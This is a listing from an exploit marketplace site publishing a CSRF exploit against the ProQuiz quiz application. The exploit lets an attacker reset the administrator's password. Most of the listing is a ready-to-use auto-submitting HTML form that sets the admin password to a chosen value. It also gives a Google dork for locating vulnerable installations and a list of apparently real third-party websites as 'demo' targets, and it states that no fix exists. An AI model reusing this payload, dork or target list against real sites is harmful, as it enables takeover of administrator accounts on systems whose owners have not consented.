[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ProQuiz v2.X.X CSRF (change admin passwd) Vulenrability

Author
TUNISIAN CYBER
Risk
[
Security Risk High
]
0day-ID
0day-ID-21669
Category
web applications
Date add
15-12-2013
Platform
php
[+] Author: TUNISIAN CYBER
[+] Exploit Title:  ProQuiz v2.X.X CSRF (change admin passwd) Vulenrability
[+] Date: 14-12-2013
[+] Category: WebApp
[+] Vendor:http://proquiz.softon.org/
[+] Google Dork: intext:"Powered by - Softon Technologies"
[+] Tested on: Win7 , ubuntu 13.04
[+] Friend's blog:https://na3il.wordpress.com 
  
########################################################################################
I/Exloit:

</form> 
<html>
<body onload="document.form0.submit();"> 
<form method="POST" name="form0" action="http://127.0.0.1/[PATH]/functions.php?action=edit_profile&type=password">  
<input type="hidden" name="password" value="pass123"/> 
<input type="hidden" name="cpassword" value="pass123"/> 
</form> 
</body>
</html>

II/Fix:
No Fix Until now

Demo:
http://webexamiq.com/index.php
http://ticedu.fr/proquiz/
http://effchurch.org/pquiz/l
http://www.giup1tay.com/tracnghiem/
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

#  0day.today [2024-12-26]  #